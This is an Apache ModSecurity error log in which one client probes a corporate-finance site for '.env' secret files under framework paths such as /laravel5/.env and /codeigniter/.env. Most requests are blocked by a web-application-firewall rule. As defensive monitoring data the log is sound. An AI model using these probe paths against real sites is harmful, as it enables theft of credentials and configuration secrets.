[Mon May 11 16:26:02.278101 2026] [security2:error] [pid 1411055:tid 1411067] [client 18.180.54.2:57900] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/cakephp/.env"] [unique_id "agHm-kWKUxpmnkK7zHx7zwAAAQo"]
[Mon May 11 16:26:02.740073 2026] [security2:error] [pid 1411099:tid 1411122] [client 18.180.54.2:57914] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /codeigniter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/codeigniter/.env"] [unique_id "agHm-g-Qm4vhlWBPlMi56QAAABY"]
[Mon May 11 16:26:02.740327 2026] [security2:error] [pid 1411099:tid 1411122] [client 18.180.54.2:57914] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/codeigniter/.env"] [unique_id "agHm-g-Qm4vhlWBPlMi56QAAABY"]
[Mon May 11 16:26:02.740808 2026] [core:error] [pid 1411099:tid 1411122] [client 18.180.54.2:57914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:02.740976 2026] [security2:error] [pid 1411099:tid 1411122] [client 18.180.54.2:57914] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/codeigniter/.env"] [unique_id "agHm-g-Qm4vhlWBPlMi56QAAABY"]
[Mon May 11 16:26:02.955369 2026] [security2:error] [pid 1416109:tid 1416137] [client 18.180.54.2:57916] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /zend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/zend/.env"] [unique_id "agHm-lV4kyjgo4bQBUhUIAAAAMc"]
[Mon May 11 16:26:02.955595 2026] [security2:error] [pid 1416109:tid 1416137] [client 18.180.54.2:57916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/zend/.env"] [unique_id "agHm-lV4kyjgo4bQBUhUIAAAAMc"]
[Mon May 11 16:26:02.956058 2026] [core:error] [pid 1416109:tid 1416137] [client 18.180.54.2:57916] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:02.956232 2026] [security2:error] [pid 1416109:tid 1416137] [client 18.180.54.2:57916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/zend/.env"] [unique_id "agHm-lV4kyjgo4bQBUhUIAAAAMc"]
[Mon May 11 16:26:03.439778 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:57918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cakephp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cakephp/.env"] [unique_id "agHm-_y_GXSWIKeli0vyLQAAAJg"]
[Mon May 11 16:26:03.440011 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:57918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cakephp/.env"] [unique_id "agHm-_y_GXSWIKeli0vyLQAAAJg"]
[Mon May 11 16:26:03.440498 2026] [core:error] [pid 1411201:tid 1411269] [client 18.180.54.2:57918] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:03.440659 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:57918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cakephp/.env"] [unique_id "agHm-_y_GXSWIKeli0vyLQAAAJg"]
[Mon May 11 16:26:03.636480 2026] [security2:error] [pid 1416109:tid 1416141] [client 18.180.54.2:57922] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /yii/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/yii/.env"] [unique_id "agHm-1V4kyjgo4bQBUhUIQAAAMs"]
[Mon May 11 16:26:03.636718 2026] [security2:error] [pid 1416109:tid 1416141] [client 18.180.54.2:57922] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/yii/.env"] [unique_id "agHm-1V4kyjgo4bQBUhUIQAAAMs"]
[Mon May 11 16:26:03.637233 2026] [core:error] [pid 1416109:tid 1416141] [client 18.180.54.2:57922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:03.637400 2026] [security2:error] [pid 1416109:tid 1416141] [client 18.180.54.2:57922] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/yii/.env"] [unique_id "agHm-1V4kyjgo4bQBUhUIQAAAMs"]
[Mon May 11 16:26:04.162908 2026] [security2:error] [pid 1411201:tid 1411263] [client 18.180.54.2:57928] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /zend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/zend/.env"] [unique_id "agHm_Py_GXSWIKeli0vyLgAAAJE"]
[Mon May 11 16:26:04.163122 2026] [security2:error] [pid 1411201:tid 1411263] [client 18.180.54.2:57928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/zend/.env"] [unique_id "agHm_Py_GXSWIKeli0vyLgAAAJE"]
[Mon May 11 16:26:04.163603 2026] [core:error] [pid 1411201:tid 1411263] [client 18.180.54.2:57928] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:04.163746 2026] [security2:error] [pid 1411201:tid 1411263] [client 18.180.54.2:57928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/zend/.env"] [unique_id "agHm_Py_GXSWIKeli0vyLgAAAJE"]
[Mon May 11 16:26:04.316541 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:57932] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel5/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/laravel5/.env"] [unique_id "agHm_DJnyuKVXoStDha0hQAAAFE"]
[Mon May 11 16:26:04.316765 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:57932] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/laravel5/.env"] [unique_id "agHm_DJnyuKVXoStDha0hQAAAFE"]
[Mon May 11 16:26:04.317269 2026] [core:error] [pid 1412074:tid 1412093] [client 18.180.54.2:57932] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:04.317430 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:57932] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/laravel5/.env"] [unique_id "agHm_DJnyuKVXoStDha0hQAAAFE"]
[Mon May 11 16:26:04.860905 2026] [security2:error] [pid 1411201:tid 1411256] [client 18.180.54.2:57948] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /yii/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/yii/.env"] [unique_id "agHm_Py_GXSWIKeli0vyLwAAAIo"]
[Mon May 11 16:26:04.861138 2026] [security2:error] [pid 1411201:tid 1411256] [client 18.180.54.2:57948] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/yii/.env"] [unique_id "agHm_Py_GXSWIKeli0vyLwAAAIo"]
[Mon May 11 16:26:04.861620 2026] [core:error] [pid 1411201:tid 1411256] [client 18.180.54.2:57948] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:04.861788 2026] [security2:error] [pid 1411201:tid 1411256] [client 18.180.54.2:57948] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/yii/.env"] [unique_id "agHm_Py_GXSWIKeli0vyLwAAAIo"]
[Mon May 11 16:26:05.030356 2026] [security2:error] [pid 1412074:tid 1412089] [client 18.180.54.2:57964] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/v1/.env"] [unique_id "agHm_TJnyuKVXoStDha0hwAAAE0"]
[Mon May 11 16:26:05.030577 2026] [security2:error] [pid 1412074:tid 1412089] [client 18.180.54.2:57964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/v1/.env"] [unique_id "agHm_TJnyuKVXoStDha0hwAAAE0"]
[Mon May 11 16:26:05.031117 2026] [core:error] [pid 1412074:tid 1412089] [client 18.180.54.2:57964] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:05.031301 2026] [security2:error] [pid 1412074:tid 1412089] [client 18.180.54.2:57964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/v1/.env"] [unique_id "agHm_TJnyuKVXoStDha0hwAAAE0"]
[Mon May 11 16:26:05.572355 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:57980] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel5/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/laravel5/.env"] [unique_id "agHm_fy_GXSWIKeli0vyMAAAAIc"]
[Mon May 11 16:26:05.572529 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:57980] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/laravel5/.env"] [unique_id "agHm_fy_GXSWIKeli0vyMAAAAIc"]
[Mon May 11 16:26:05.573011 2026] [core:error] [pid 1411201:tid 1411253] [client 18.180.54.2:57980] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:05.573172 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:57980] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/laravel5/.env"] [unique_id "agHm_fy_GXSWIKeli0vyMAAAAIc"]
[Mon May 11 16:26:05.764066 2026] [security2:error] [pid 1412074:tid 1412081] [client 18.180.54.2:57984] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/v2/.env"] [unique_id "agHm_TJnyuKVXoStDha0iAAAAEU"]
[Mon May 11 16:26:05.764313 2026] [security2:error] [pid 1412074:tid 1412081] [client 18.180.54.2:57984] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/v2/.env"] [unique_id "agHm_TJnyuKVXoStDha0iAAAAEU"]
[Mon May 11 16:26:05.764794 2026] [core:error] [pid 1412074:tid 1412081] [client 18.180.54.2:57984] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:05.764947 2026] [security2:error] [pid 1412074:tid 1412081] [client 18.180.54.2:57984] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/v2/.env"] [unique_id "agHm_TJnyuKVXoStDha0iAAAAEU"]
[Mon May 11 16:26:06.269001 2026] [security2:error] [pid 1411201:tid 1411259] [client 18.180.54.2:57990] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/v1/.env"] [unique_id "agHm_vy_GXSWIKeli0vyMQAAAI0"]
[Mon May 11 16:26:06.269299 2026] [security2:error] [pid 1411201:tid 1411259] [client 18.180.54.2:57990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/v1/.env"] [unique_id "agHm_vy_GXSWIKeli0vyMQAAAI0"]
[Mon May 11 16:26:06.269804 2026] [core:error] [pid 1411201:tid 1411259] [client 18.180.54.2:57990] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:06.269962 2026] [security2:error] [pid 1411201:tid 1411259] [client 18.180.54.2:57990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/v1/.env"] [unique_id "agHm_vy_GXSWIKeli0vyMQAAAI0"]
[Mon May 11 16:26:06.464857 2026] [security2:error] [pid 1416109:tid 1416153] [client 18.180.54.2:58004] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/v3/.env"] [unique_id "agHm_lV4kyjgo4bQBUhUJwAAANc"]
